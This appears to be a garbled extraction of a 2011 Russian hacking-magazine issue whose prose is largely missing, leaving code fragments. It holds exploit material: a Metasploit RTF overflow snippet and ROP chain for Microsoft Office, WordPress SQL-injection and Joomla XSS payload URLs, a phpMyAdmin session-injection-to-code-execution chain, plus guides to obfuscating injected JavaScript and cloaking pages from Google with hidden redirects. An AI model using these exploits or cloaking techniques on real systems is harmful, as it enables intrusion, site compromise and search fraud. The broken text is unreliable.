( ), , Ikazuchi DEP/ASRL Bypass,
DEP/ASLR.
EXPLOIT
RTF (Rich Text Format) Microsoft Office
Word 2003:

044

.
.
:
{ \shp, { \*\shpinst.
. :
{\sp{\sn PropertyName}{\sv PropertyValueInformation}}

, \sp
: (\sn) (\sv).
POC RTF- \sn, pFragments
, \sv, pFragments.
, ,
, , ,
RTF- .
:
{\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv A;B;[word1]
[word2][word3][hex_value_array]}}}}}

A , 2,4 8;
B ;
word1 2- (sizeof(WORD)), ;
X 09 /152/ 2011

, phpMyAdmin
word2 2- , word1;
word3 2- ,
;
word1*word2
hex_value_array,
;
hex_value_array , ,
, ,
.
word1, word2 word3 : , .
metasploit, rtf-,
:
sploit = "%d;%d;" % [el_size, el_count]
sploit << data.unpack('H*').first
sploit << rest.unpack('H*').first
content
content
content
content
content

= "{\\rtf1"
<< "{\\shp"
#
<< "{\\sp"
#
<< "{\\sn pFragments}"#
<< "{\\sv
#{sploit}}" #


mso.dll:
39200b61
39200b63
39200b66
39200b69

je short mso.39200b82
mov ecx,dword ptr ss:[ebp+8]
mov eax,dword ptr ds:[ecx+c]
and eax,0ffff

39200b6e
39200b6f
39200b73
39200b76
39200b77
39200b7a

push eax
;n
imul eax,dword ptr ss:[ebp+10]
add eax,dword ptr ds:[ecx+10]
push eax
; src
push dword ptr ss:[ebp+c]
; dest
call <jmp.&msvcr90.memcpy> ; memcpy - overflow!

39200b7f
39200b82
39200b83

add esp,0c
pop ebp
retn 0c

ROP-, .
ROP-:
0x3F2CB9E0

POP ECX
RETN
# HeapCreate() IAT = 3F10115C

0x3F389CA5

MOV EAX,DWORD PTR DS:[ECX]


RETN
# EAX == HeapCreate()

content << "}"


content << "}"
content << "}"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(content)
X 09 /152/ 2011

045


ROP-

XSS
CSRF

0x3F39AFCF

CALL EAX
RETN
# HeapCreate()
# EAX
#

0x3F2CB9E0

POP ECX
RETN
# pop 0x00008000 ECX

# ECX
#
0x3F39795E

0x3F39CB46

ADD EAX,ECX
POP ESI
RETN
# ECX EAX ,
# HeapAlloc, EAX RWX-

0x3F2CB9E0

POP ECX
RETN
# pop 0x3F3B3DC0 ECX,
# -

MOV DWORD PTR DS:[ECX],EAX


RETN
# RWX-
# 0x3F3B3DC0 (ECX)

POP EDX
RETN
# pop 0x00000024 EDX

0x3F39CB44

ADD ECX,EDX
ADD EAX,ECX
POP ESI
RETN
# 0x24 ECX ( )

0x3F398267

MOV EAX,ECX
RETN

0x3F2233CC

POP EAX
ADD DWORD PTR DS:[EAX],ESP
RETN
pop 0x3F3B3DC4 EAX,
0 -
, 0
ESP, ESP ,
( )

0x3F2D59DF

#
#
#
#
#

0x3F3A16DE

MOV DWORD PTR DS:[ECX],EAX


XOR EAX,EAX
POP ESI
RETN
# EAX (Stack Address+24 =
# ESP )
# ESI. ESI
# ,

0x3F398267

MOV EAX,ECX
RETN

0x3F2CB9E0
0x3F2F18CC POP EAX
RETN
# pop 0x3F3B3DC4 ( ESP address ) EAX

POP ECX
RETN
# pop 0x3F3B3DC0 ( ) ECX

0x3F389CA5
0x3F2B745E

046

MOV ECX,DWORD PTR DS:[EAX]


RETN

MOV EAX,DWORD PTR DS:[ECX]


RETN
# EAX RWX-
X 09 /152/ 2011

PMA_createTargetTables
: Snake
CVE: CVE-2011-0611
, DEP/ASLR CVE-2011-0611, 4
2011 .

memcpy,
0x3F2B0A7C

XCHG EAX,EDI
RETN 4
# EDI = RWX-

0x3F2CB9E0

POP ECX
RETN
# pop 0x3F3B3DC0 ( ) ECX

EXPLOIT
DEP/ASLR Tatsumaki.
Adobe-X ( sandbox).
, cryptocme2.dll.
cryptocme2.dll:
<</Type/Catalog/Pages 3 0 R/OpenAction 5 0 R/AcroForm 7 0 R >>
And then

0x3F389CA5

MOV EAX,DWORD PTR DS:[ECX]


RETN
# EAX RWX-

8 0 obj
<</Length 372>>

0x3F38BEFB

ADD AL,58
RETN
# - :)

0x3F2CB9E0

POP ECX
RETN
# pop 0x00000080 ECX
# (0x80 * 4 = 0x200 = )

0x3F3441B4

REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]


POP EDI
POP ESI
RETN
# RWX-

CALL EAX
RETN
#

stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/2.6/">
<present><pdf><interactive>1</interactive></pdf></present>
</config>
<template xmlns="http://www.xfa.org/schema/xfatemplate/2.6/">
<subform name="form1" layout="tb" locale="en_US">
<pageSet></pageSet>
</subform></template></xdp:xdp>
endstream
endobj

0x3F39AFCF

xref

TARGETS
Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010,
Office 2004 2008 Mac, Office Mac 2011 Open XML File Format
Converter Mac.
SOLUTION
.

02

Adobe Reader X Atom Type Confusion


Vulnerability Exploit

CVSS V2 BASE SCORE:

9.3 (HIGH)

,
ASLR,
:).
TARGETS
Adobe Flash Player 10.2.154.27 Windows, Mac OS X, Linux,
Solaris, 10.2.156.12 Android;
Adobe AIR 2.6.19140;
Authplay.dll ( AuthPlayLib.bundle) Adobe Reader 9.x
9.4.4 10.x 10.0.1 Windows;
Adobe Reader 9.x 9.4.4 10.x 10.0.3 Mac OS X;
Adobe Acrobat 9.x 9.4.4 10.x 10.0.3 Windows Mac OS X

( )
Flash-.

(AV:N/AC:M/Au:N/C:C/I:C/A:C) (legend)
BRIEF
: 3 2011
X 09 /152/ 2011

SOLUTION
Adobe Flash Player.

047

SOLUTION
3.1.4 3.2-RC3.
, -
Author.

04

XSS- Joomla! 1.6.3

CVSSV2

(AV:N/AC:M/Au:N/C:P/I:P/A:P)
BRIEF
YGN
Joomla, : com_contact, com_content, com_newsfeeds
com_search. ,
, URL.

RTF-,

03

SQL- WordPress 3.1.3

CVSSV2

6.0

(AV:N/AC:M/Au:S/C:P/I:P/A:P)
BRIEF
WordPress , ,
. , ,
, .
: SQL, Editor, !
,
WordPress, , ,
.
EXPLOIT
- ,
, .
get_terms(), wp-includes/taxonomy.php, , ,
Editor SQL- orderby order. URL
SQL- (
[]):
http://localhost/wp-admin/edit-tags.php?
taxonomy=link_category&orderby=[]&order=[]
http://localhost/wp-admin/edit-tags.php?
taxonomy=post_tag&orderby=[]&order=[]
http://localhost/wp-admin/edit-tags.php?
taxonomy=category&orderby=[]&order=[]

get_bookmarks(),
wp-includes/bookmark.php, URL
: http://
localhost/wp-admin/link-manager.php?orderby=[]&
order=[].
, ,
, , . ,
sqlmap, BackTrack.
TARGETS
WordPress 3.1.3/3.2-RC1 , , .

048

6.8

EXPLOIT
Joomla!
,
QueryString, option searchword. PoC com_contact
QueryString :
http://attacker.in/joomla163_noseo/index.php?option=com_c
ontact&view=category&catid=26&id=36&Itemid=1";><script>alert(/XSS/)</script>

:
http://attacker.in/joomla163_noseo/index.php?option=com_c
ontent&view=category&id=19&Itemid=260&limit=10&filter_order_
Dir=&limitstart=&filter_order=><script>alert(/XSS/)</script>
http://attacker.in/joomla163_noseo/index.php?option=com_n
ewsfeeds&view=category&id=17&whateverehere=";><script>
alert(/XSS/)</script>&Itemid=253&limit=10&filter_order_
Dir=ASC&filter_order=ordering
http://attacker.in/joomla163_noseo/index.
php?option=";><script>alert(/XSS/)</script>&task=reset.
request

com_search searchword POST-


(Live HTTP Headers, Tamper Data, etc).
:
POST /joomla163/index.php HTTP/1.1
Referer: http://attacker.in/joomla163/
User-Agent: Konqueror/4.5
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: attacker.in
Accept-Encoding: gzip, deflate
Content-Length: 125
option=com_search&searchword='%2522%253C%252Fscript%253E%2
53Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E&ta
sk=search

TARGETS
Joomla! 1.6.3 .
X 09 /152/ 2011

? $c $_SESSION,
, , .
, config/config.inc.php
PHP-, !
.
server_synchronize.php:

SOLUTION
Joomla! 1.6.4 .

05


phpMyAdmin 3.x

CVSSV2

7.5

(AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
Mango phpMyAdmin -,
MySQL.
SQL- XSS ,
-. .
EXPLOIT
libraries/auth/swekey/swekey.auth.lib.php
266-276 :
if (strstr($_SERVER['QUERY_STRING'],'session_to_unset')
!= false)
{
parse_str($_SERVER['QUERY_STRING']);
session_write_close();
session_id($session_to_unset);
session_start();
$_SESSION = array();
session_write_close();
session_destroy();
exit;
}

, parse_str
, , $_
SESSION. SQL XSS, ,
.
, , 42,
.
, $cf->getServerName($id) , , . $id,
$c[Servers], . , */,
PHP-. $c
$cf->getConfig() 26. , ,
:
public function getConfig()
{
$c = $_SESSION[$this->id];
foreach ($this->cfgUpdateReadMapping as $map_to =>
$map_from)
{
PMA_array_write($map_to, $c, PMA_array_read(
$map_from, $c));
PMA_array_remove($map_from, $c);
}
return $c;
}

X 09 /152/ 2011

466: $trg_db = $_SESSION['trg_db'];


477: $uncommon_tables = $_SESSION['uncommon_tables'];
674: PMA_createTargetTables($src_db, $trg_db, $src_link,
$trg_link, $uncommon_tables,
$uncommon_table_structure_diff[$s],
$uncommon_tables_fields, false);

PMA_createTargetTables . , $uncommon_
tables[$table_index] $trg_db
$_SESSION. , ,

preg_replace, 627-631.
, e
, ,
PHP-.
. :
Suhosin, ... : , ,
- .
, , .
libraries/display_tbl.lib.php, 1291-1299:
if ($GLOBALS['cfgRelation']['mimework'] &&
$GLOBALS['cfg']['BrowseMIME'])
{
if (isset($GLOBALS['mime_map'][$meta->name]['mimetype']) &&
isset($GLOBALS['mime_map'][$meta->name]['transformation']) &&
!empty($GLOBALS['mime_map'][$meta->name]'transformation']))
{
$include_file =
$GLOBALS['mime_map'][$meta->name]['transformation'];
if (file_exists('./libraries/transformations/'.
$include_file))
{
$transformfunction_name = str_replace('.inc.php', '',
$GLOBALS['mime_map'][$meta->name]['transformation']);
require_once
'./libraries/transformations/' . $include_file;

require_once $include_file,
$GLOBALS, . ,
$GLOBALS['mime_map'][$meta->name]['transformation'] ../../../../../../etc/passwd, /etc/
passwd. , .
exploit-db.com , 17510
17514, !
TARGETS
phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1
SOLUTION
phpMyAdmin . z

049


|qbz| (lopuxin.iv@yandex.ru, essenzo.net)

JAVASCRIPT:

,
-

,
, ,
.
JavaScript
-, (iframe), SEO.
JS-,
, , .

-, :
1. ?
web-,
,
.
:
HTML- ;
JavaScript-/JS- ;
CSS-/CSS- ;
( , data).
2. ?
:
( iframe
);
(,
JavaScript , - ).
3.
?

050

.
? , , . ,
/
, , . ,
.
.
4. / ?
: /
. PHP-, .
JavaScript:
, , .

HTML/CSS

, HTML- CSS-?
: JavaScript,
HTML-.
X 09/152/ 2011


(script.js). index.html
:
<script type="text/javascript"
src="./script.js"></script>

text, (script.js) javascript


. :
<script src="text/javascript"
type="./script.js"></script>

. , :

JJEncode
( //):
<html>
<script>
var html = '<center><h3> -</h3>
</center>'; // "html"-,

document.getElementsByTagName('html')[0].
innerHTML = html; //
<html> </html>
</script>
</html>

CSS-:
<html>
<script>
var css = 'body{margin:0px;}.subcl{padding:5px;}';
// "css" ,
//
document.getElementsByTagName('html')[0].
innerHTML = '<style>'+css+'</style>';
// <html> </html>
</script>
</html>

HTML CSS
,
JavaScript.
, - , .
.


<script>

,
,
.
.
(index.html) JavaScript-,
X 09/152/ 2011

<script src="text/javascript" type="http://host.


com////////
/script.js"></script>

: !
,
JavaScript.
:).

JavaScript-


JS-,
. ,
onLoad, onClick ..
:

HTTP://WWW
links
javascriptobfuscator.com
.
utf-8.jp/public/jjencode.html
.
dean.edwards.
name/packer
javascript.
jsbeautifier.org
.

<body onLoad="alert(1);"></body>
<textarea onClick="alert(1);"></textarea>

, body frameset
onLoad,
/.
, .

Cookie, Referrer

JavaScript , cookie (document.cookie),


(document.referrer) (location.href).
,
eval(),

JavaScript-.
,
:

DVD
dvd



JavaScript ,

.

cookievalue=||alert(1);||

:
<script>eval(unescape(document.cookie).
split("||")[1]);</script>

051

][akep
cookie-
, ||.
([1]) eval().
, ,
, , ,
! :
<?php
// JavaScript- + ( 123)
setcookie('cook', '||alert(1);document.
cookie="cook=123";||');
?>
<script>
//
eval(unescape(document.cookie).split('||')[1]);
</script>

, JavaScript, , location.href document.referrer.

Ajax

,

eval().
,
:
1. , ( l):
alert(1);

2. :
<script>function x(){try{return new XMLHttpRequest();}
catch(e){try{return new ActiveXObject('Msxml2.XMLHTTP');}
catch(e){try{return new ActiveXObject('Microsoft.
XMLHTTP');}catch(e){return null;}}}};function
y(){var z=x();if(z){z.open('get','./l');z.
onreadystatechange=function(){if(z.readyState==4){eval(z.
responseText);}};z.send(null);}};y();</script>

(
l). , , .

, , ,
Opera. ,

( nullbyte ASCII 0). ?
, Opera - . :
<html> - </html>
<?php echo(chr(0)); ?>

052


<script>alert(1); /* */</script>

,
. PHP , .

HTML-

HTML, . , :
<body><img src="./pict.jpg" a="al" b="er" c="t(1);"></body>
<script>a = document.body.innerHTML; eval(a.split('a="')
[1].split('"')[0]+a.split('b="')[1].split('"')[0]+a.
split(' c="')[1].split('"')[0]);</script>

img,
, .
HTML/JavaScript :
HTML:
<!-- alert(1); -->
JavaScript:
// alert(1);
/* alert(1); */

,
, jQuery, mooTools
. , (
).
, , , , ,
, , .
JS-.


/ JavaScript

,
JavaScript :
:
<script>document.getElementsByTagName("html")[0].innerHTML
= document.getElementsByTagName("body")[0].length;
</script>
:
<script>a=document;c='getElementsByTagName';a[c]("html").
innerHTML = a[c]("body")[0].innerHTML.length;</script>

document
a, getElementsByTagName c.
X 09/152/ 2011


, (, , ,
.length .getElementsByTagName)
(
). document,
getElementsByTagName, ,
:
1) document.getElementsByTagName
2) document['getElementsByTagName']

,
(getElementsByTagName), ,
,
.

//.
, .

,
, -,
. , :
:
<script>/* pOIEPGpmkG13Pg */ a /* PGpmkG13Pggweg */ = /*
mkG13Pg */ 'hahaha' /* pOIE13Pg */ ; /* wegEGoh */ alert /*
oiwboierhper */ ( /* igwepreorh */ a /* wbnponrhR */ ) /*
inboierh */ ; /* roinero */</script>
:
<script> weoibog = 'gwrobgoerh'; a = 'hahaha'; bfionb =
'wgeogioweg'; alert(a);

,
: a = hahaha; alert(a);.
.
PHP-
JavaScript. - ,
,
.
, :
/*/ alert(1); /*/ alert(2); /*/ alert(3); /*/

? :)

- , , X 09/152/ 2011


, -
:
<script> alert(document["\x63\x6F\x6F\x6B\x69\x65"]);
</script>

-,
cookie document, .
-, .
cookie ,
document.cookie, ,
( ), document.
cookie .
PHP- :
<?php
function cescape($s)
{
foreach (str_split($s,1) as $sym)
{
$d = dechex(ord($sym));
$c[] = (strlen($d) == 1) ? '0'.$d : $d;
}

053

return (''.'\\'.implode(''.'\\',$c));
}
?>

, JavaScript
, : document.
getElementById document[getElementById]. ,
.
-
. , getElementById.
:
<script> a = b(c(d())); </script>

, b, c d
. ,
, try{}catch(){}:
<script> try{a = b(c(d()))}catch(e){alert(e);} </script>

, , ,
,
.
,
getElementById?
:
<script>try{(getE(leme(ntB(yId()))))}catch(e){x = (e+'').
split('(').slice(1,5).join('');}</script>


getElementById, x.
? , ,
.
, JavaScript.

~ () : alert(~13);. -14.
-(+1).
, a , : a = ~[];
a -1. ?

0, , ~0
-(0+1), -1.
:
a
a
a
a
a
a
a

=
=
=
=
=
=
=

~[]; // -1
-~[]; // 1
[]^[]; // 0
~~[]; // 0
~true; // -2
~false; // -1
-~[]*(""+-~[]+-~-~-~-~-~[]+-~-~true); // 153

/ -

054

.
JavaScript.
, ,
.
, , code.
, charCodeAt(),
fromCharCode() .
:
a = (alert+'').split("ive ")[1].substr(0,4);

a
code. .
: alert(alert+);. - function alert()
{ [native code] }. , -
alert(),
.
, . ,
, JavaScript
. ,
,
, , (+).

/ JavaScript
. :
escape(); // URL
unescape(); // URL-
encodeURI(); // URI
decodeURI(); // URI-

String, ASCII- :
a = String.fromCharCode(97);
b = "b".charCodeAt();

, .match .replace.
, , .


(, ).
, ,
. []. , document.
this. JavaScript, this
, ,
. getElementById : this[document]
[getElementById].

,
.
, JavaScript- ,
,
.
:
, ,
/.
X 09/152/ 2011

+ ,
:
// location.href.split('/')[2];
( #?) //
location.href.split('#')[1] location.href.split('?').
slice(1);
// a = new Date();
JavaScript // <script id="jscode">a =
document.getElementById('jscode').innerHTML;</script>;
// a = document.
getElementsByTagName('html')[0].innerHTML;
// a = navigator.userAgent;
- // document.cookie;
, .

eval(),
document.write() .
alert() ,
,
, , . , eval()?
, this. eval() :
a = this["\x65\x76\x61\x6C"];.


a() eval().

:
1)
2)
3)
4)

"o", "O", "0"


"i", "I", "l", "1"
"_" ( "__", "___" ...)
"$" ( "$$", "$$$" ...)


, , .

, -
/ . : eval()
+ _() + _.
.
, alert(1);. ,
(ASCII ),
( ) . , ,
,
2-2,5 , ,
- (
). %,
URL-.
PHP-:
<?php
$a = "alert(1);";
$a = str_split($a, 2);
X 09/152/ 2011

$e = '';
foreach ($a as $v)
{
$e .= '%' . $v[0] . (ord($v[0])+ord($v[1]));
}
echo($e);
?>

: %a205%e215%t156%190%;59.
JavaScript:
function d(s)
{
s = s.split('%').slice(1);
c = '';
for (i = 0; i < s.length; i++)
{
c += s[0] + String.fromCharCode(
s.substr(1)-s[0].charCodeAt());
}
return c;
}

: eval(d('%a205
%e215%t156%190%;59'));.
.
,
:
z = '73706C697421736C696365216C656E6774682166726F6D436861
72436F6465217375627374722163686172436F64654174';
_='';
for(__=0;__<z.length/2;__++){_+=unescape('%'+z[__*2]+z[_
_*2+1]);}
_=_[_[0]+_[1]+_[2]+_[3]+_[4]]('!');function ___(__){__
= __[_[0]]('\x25')[_[1]](-~[]); _I='';for (_l=0;_l<__[_
[2]];_l++){_I+=__[_l][0]+String[_[3]](__[_l][_[4]](1)-__
[_l][0][_[5]]());}return _I;}
this['\x65\x76\x61\x6C'](___('%a205%e215%t156%190%;59'));


:
1. z = '....'

,
split!slice!length!fromCharCode!substr!charCod
eAt (\x73\x70\x6C\x69\x74...) \;
2. _='';for(...}

split!slice!length!fromCharCode!substr!
charCodeAt _;
3. _=_...('!');

, !;
4. function ___(__){...}

d() ;
5. this['\x65\x76\x61\x6C'](....);

, .
100% ,

. ,
,
,
. , . z

055


RushteR (rushter.com)


GOOGLE

, .

.

SEO. ,

,
.

SEO-, ,

.
, ?
.
,
().
. , , .
,
, ,
. : (),
,
.
,

056

,
,
. ,
, .

, ,
- (
Google).
:
1. ( ).
2.
.
,
, .
.

HTTP://WWW
links
jscompress.com

JavaScript .
jquery.com Jquery.
addons.mozilla.org/
en-US/firefox/addon/
modify-headers
modify headers
FireFox.

X 09/152/ 2011

Modify Headers

, Google
, User-Agent
.
, google PHP:

HTTP referrer;
User-Agent;
IP-;
JavaScript.

HTTP .
, ,
.
.

HTTP referrer


HTTP referrer.

:
1. .
2. .
:
<?php
if (strstr($_SERVER['HTTP_REFERER'],
"http://google.")
echo ' ';
else
echo ' ';
?>

,
- , . HTTP
referrer .

User-Agent

HTTP-
User-Agent .
.

.
, Google , , User-Agent.
:
Mozilla/5.0 (compatible; Googlebot/2.1;
+http://www.google.com/bot.html)
Googlebot/2.1 (+http://www.google.com/bot.html)

<?php
if(stristr("google",$_SERVER["HTTP_USER_AGENT"]))
echo ' ';
?>

IP-

IP-
. ,
, , .
, ,
.
IP- hostname
google:
<?php
$stop_ips_masks = array(
"66\.249\.[6-9][0-9]\.[0-9]+",
"70\.91\.180\.25",
"81\.159\.49\.212");
foreach ( $stop_ips_masks as $v )
{
if ( preg_match( '#^'.$v.'$#', $_SERVER['REMOTE_ADDR']))
{
echo ' ';
break;
}
}
if (strpos(gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
echo ' ';
?>


,
, .

IP-

IP-,

.
, IP- :
<div style="display:none"><a href='target.php'>click</a></div>

X 09/152/ 2011

057

HTTP-
IP- :
<?php
$f = fopen('base.txt','a+');
fwrite($f,str_replace('.', '\.', "'".
$_SERVER['REMOTE_ADDR']."',\n"));
fclose($f);
?>

IP-, .

.

JS-

, ,
. JavaScript Google , ,
. , JS-

.
JQuery,
.
, , JavaScript-, , ,
. , .


? , - ,
: , , ,
..
, ,
.
,
JQuery:
$(document).ready(function () {
$(window).bind(
'click mousemove scroll resize keydown',function(event) {
alert(' : '+event.type);
});
});

,
, . image.png
:
<?php
if(stristr("google",$_SERVER["HTTP_USER_AGENT"]))
{
header('Content-Type: image/png' );

058

readfile('image2.png');
}
else
{
header('HTTP/1.1 404 Not Found');
die();
}
?>

png,
.htaccess :
AddType application/x-httpd-php .png

JavaScript ,
:
document.write('<img src="image.png"/>');
$(document).ready(function () {
$('img[src*="png"]').error(function () {
alert(' ');
})
});

? image.
png ,
404.
JavaScript- , (
, ).
, JavaScript- Google ,
. ,
, ,
, , .

,
. ,
, ,
, ,
.
:
document.write('<div id="dialog" class="window"> <img
src="promo.jpg" style="cursor: pointer;"> </div> <div
2id="mask"></div>');
$(document).ready(function () {
$("#dialog").css('position', 'absolute');
$("#dialog").css('display', 'none');
$("#dialog").css('z-index', '9999');
$("#mask").css('position', 'absolute');
$("#mask").css('left', '0');
$("#mask").css('top', '0');
$("#mask").css('z-index', '9000');
$("#mask").css('background-color', '#000000');
$("#mask").css('display', 'none');
$(window).bind('mousemove scroll resize keydown',
function (eve) {
var maskHeight = $(document).height();
var maskWidth = $(window).width();
$('#mask').css({
'width': maskWidth,
X 09/152/ 2011

,
:
1. :
Action = Modify
Name = Referer
Value = http://google.com

2. Options Always on.


3.
.


.
:

JQuery
'height': maskHeight
});
$('#mask').fadeIn(1000);
$('#mask').fadeTo("slow", 0.90);
$("#mask").css('background-color', '#000000');
var winH = $(window).height();
var winW = $(window).width();
$("#dialog").css('top', winH / 2 $("#dialog").height() / 2);
$("#dialog").css('left', winW / 2 $("#dialog").width() / 2);
$("#dialog").fadeIn(2000);
$(window).bind('click', function (event) {
$(this).load('pl.txt', function (resp) {
eval('window.location = "' + resp + '";');
$(this).unbind(event);
});});});});

- ,
,
,
pl.txt. ,
,
. - , ,

.
, , ,
. - :

.

,
, :). , ,
,
FireFox Modify Headers.
Modify Headers
X 09/152/ 2011

User Agent;
Referrer;
IP;
;
;
;
,
.

IP-
.
.htaccess, ,
.

Google Toolbar

, Google ,
,
Google Toolbar. ,
.
Google toolbar javascript,
. , . , ,
, .
Google, , ,
. ,
.
, , .
,
.

,
. ,
.
, IP-
. (javascript, ),

. ,
. z

059


oxdef (oxdef.info)

OWASP APPSEC EUROPE 2011:


?


-
Twitter,
IBM,
, ?
, , -
. , .
Intro

XSS, CSRF, SQLi, Click-Jacking - ,


, OWASP
WASC. The Open Web Application Security Project (OWASP)
, , .
, ,
-.
10
- OWASP Top10 (
,

. .).
, HTTP WebScarab Zed Attack Proxy,
WAF ModSecurity, - WebGoat .
, . AppSec Europe 2011 OWASP , ,
- .

OWASP AppSec

OWASP AppSec 2004 2005



, ,
, , .

,
-
( ).
( 7 11 ), ,
.
, .

060

(, , ),

- ( ). , . : Fortify/HP, Adobe,
IBM, Verizon, Microsoft, . ,
, :).

,
7 Elements Ltd
APT :). APT , Debian GNU/
Linux. APT Advanced Persistent Thread (
). ,
,
, ,
. ,
, -
, - .
( APT!)
( )
APT ! :) ,
APT, ,
.
:
-
. ,
,
. , , , ,

- ( ), SOAP-.
X 09/152/ 2011

, :)
XML Signature
XML-, id , . ,
,
, !

.
,
-
IBM
. ,
- ? ?
,
? , IBM


:). SDLC ,

.

Python
- InGuardians
Inc. ?, . ,
Python, , ,
Perl.
- , urllib/httplib
!
.
,
X 09/152/ 2011

pycit,

-.
, ,
- .
, , SVN, .

-
CTF, .
HackQuest , CTF .
,

HTTP- .
, , , . (-,
:),
:

(, ,
).
,
.
, , SDL ?
, SDL
.

Nokia Microsoft.
, ,
. ,
. Microsoft
,
, . -

HTTP://WWW
links



:
owasp.org/index.php/
AppSecEU2011

WASC:
www.webappsec.org
Top10
OWASP:
owasp.org/index.php/
Category:OWASP_
Top_Ten_Project

-
OWASP:
owasp.org/index.php/
Category:OWASP_
Testing_Project

061

-. , ...
,
.

-
(IETF). ,
-:
Mime-Sniffing;
Same-Origin Policy;
Secure Channel: * HSTS Strict Transport Security * TLS in
DNSSEC;
Frame-Options;
Content Security Policy;
Do-Not-Track.
, HSTS. SSL-stripping
. , , ,
- ,
HTTPS, , (,
ARP-spoofing), https-
http. , ,

SSL-. HTTP Strict Transport Security (HSTS)
- -,
HTTPS.
HTTPS- : StrictTransport-Security: max-age=15768000; includeSubDomains.
- -
15768000 HTTPS,
.

Denim Group.
iOS Android-
.
,
,
SQL- , , .

062


-: <iframe
src=the_scheme://stuff?param=PAYLOAD />. . , , , ,
,
.

Gotham Digital Science
-.
.
,
.
. , , ,
padding-
, :).
,
(
www.xakep.ru/magazine/
xa/119/058/1.asp).
.
.

Outro

. -
. ,
, ,
. ,
1592 I! ,
-
. OWASP AppSec
Europe .
.
:). ,
-
. z
X 09/152/ 2011

#HACKER TWEETS


. .
. ,
.
twitter.com/asintsov .
@cesarcer:
:
,
:
,
.

@PiotrBania:


( : t.co/UexpfJP),
pwnie
awards (t.co/F6biKi6).
:
,

.

,

( , ,
)
, Blackhat 2011 -.

@LulzSec:
,
! ,

.
!

@shaver:
** : Sony Electronics

C. .

@evdokimovds:
IDA v6.1 HexRays v1.5 .
http://t.co/Q4O0B5Q

X 09/152/ 2011

@0xcharlie:
!= -.

@j00ru:

MS11-056: CVE2011-1282:
User-Mode & .
: http://t.co/fEn.
:

CSRSS CVE-2011-1282.

@aaronportnoy:
,
,
cmp reg8,
0x3E. , ,

XML-?
:
XML- cmp reg8,
0x3E (0x3E :
'>'. cmp ).
,
, , ,
XML-... )

@0xcharlie:
MS:
Windows 7 0 .
,
250 000 .
, !
: Microsoft
... ...

@kingcope:
:
root- OpenSSH
3.5p1 FreeBSD.
http://t.co/DYHct9W

@crypt0ad:
, , ,
,
... #JOP.
: JOP Jump Oriented
Programming, ROP,

(JMP reg),
RETN.

@jeremiahg:

RSA
=
-.

@Ariel_Coronel:

+. ... ,
, ,
..

@dakami:
, 88-
,
iPad. .

@attackresearch:
,
, - .

063


M4g (icq 884888, http://snipper.ru)

PHPMYADMIN


IT-
,
MySQL- phpMyAdmin
,
.
.

, , phpMyAdmin
, :).
Mango
:
./libraries/auth/swekey/swekey.auth.lib.php
if (strstr($_SERVER['QUERY_STRING'],'session_to_unset')
!= false)
{
parse_str($_SERVER['QUERY_STRING']);
session_write_close();
session_id($session_to_unset);
session_start();
$_SESSION = array();
session_write_close();
session_destroy();
exit;
}

064

, ? parse_str().
,
- .
:
1. parse_str();
2. ;
$_SERVER[QUERY_STRING] ( ,
?).

( ).
, :
$_SESSION, .
Mango ,
, .
. session_write_close()
X 09/152/ 2011

RFI
, session_id()
,
. -
, session_start()
.

:
http://pma/?session_to_unset=123&token=
[]&_SESSION[foo]=bar

,
XSS SQL-.
.


.
./setup/lib/ConfigGenerator.
class.php:
public static function getConfigFile()
{
...
$c = $cf->getConfig();
...
$ret = '<?php ' . $crlf
...
if ($cf->getServerCount() > 0) {
...
foreach ($c['Servers'] as $id => $server) {
$ret .= '/* Server: ' .
strtr($cf->getServerName($id), '*/', '-')
. " [$id] */" . $crlf . '$i++;' . $crlf;
...

.
,
PHP- phpMyAdmin.
, $c[Servers] (
$id) . ,
,
.
getConfig(),
$c:
./libraries/config/ConfigFile.class.php
public function getConfig()
{
X 09/152/ 2011

Mango
$c = $_SESSION[$this->id];
...
return $c;
}

! $c
$_SESSION, , ,
!
PHP-,
./config/config.inc.php.
(
magic_quotes_gpc).
./config ,
.

WARNING
warning
,



,

.

./config
. :
magic_quotes_gpc = On
mysql-.
:
./server_synchronize.php
...
$trg_db = $_SESSION['trg_db'];
...
$uncommon_tables = $_SESSION['uncommon_tables'];
...
PMA_createTargetTables($src_db, $trg_db,
$src_link, $trg_link, $uncommon_tables,
$uncommon_table_structure_diff[$s],
$uncommon_tables_fields, false);

PMA_createTargetTables:
./libraries/server_synchronize.lib.php
function PMA_createTargetTables($src_db,
$trg_db, $src_link, $trg_link,
&$uncommon_tables, $table_index,
&$uncommon_tables_fields, $display)
{
...
$Create_Table_Query = preg_replace('/'
.PMA_backquote($uncommon_tables[$table_index])
.'/', PMA_backquote($trg_db) . '.'
.PMA_backquote(
$uncommon_tables[$table_index]),

DVD
dvd



.

HTTP://WWW
links
Unserialize-
:


bit.ly/
onZhAu.
PHP
: PHP-
bit.
ly/n0cowc.

065

while (*q != PS_DELIMITER) {


if (++q >= endptr) goto break_outer_loop;
}
if (p[0] == PS_UNDEF_MARKER) {
p++;
has_value = 0;
} else {
has_value = 1;
}

Mango

$Create_Query, $limit = 1);


...

, , $uncommon_tables[$table_index]
$trg_db preg_replace() $_SESSION. ,
PHP-
preg_replace() e (eval), .
e

: (.+)/e%00. , , ,

:).
, ,
,
.
, Suhosin patch
e,
.

. -
. -
.
. Mango , ,


.
, ,
PoC .
PHP Session Serializer Session Data Injection Vulnerability, unserialize()
PHP (
).

, . PHP- : PS_DELIMITER PS_UNDEF_MARKER.


,
. PHP:
while (p < endptr) {
zval **tmp;
q = p;

066

,
PS_DELIMITER
PS_UNDEF_MARKER.
( : ,
, ) $_SESSION, PS_UNDEF_MARKER.
:
<?php
session_start();
$_SESSION[$_POST['prefix'] . 'bla'] = $_POST['data'];
?>

<?php
session_start();
$_SESSION = array_merge($_SESSION, $_POST);
?>

: POST prefix=! data=|xxx|O:10:"evilObject":0:{}.


. , unserialize().

,
,

phpMyAdmin.
. unserialize(), , ,
__wakeup() .

,
. ,
:
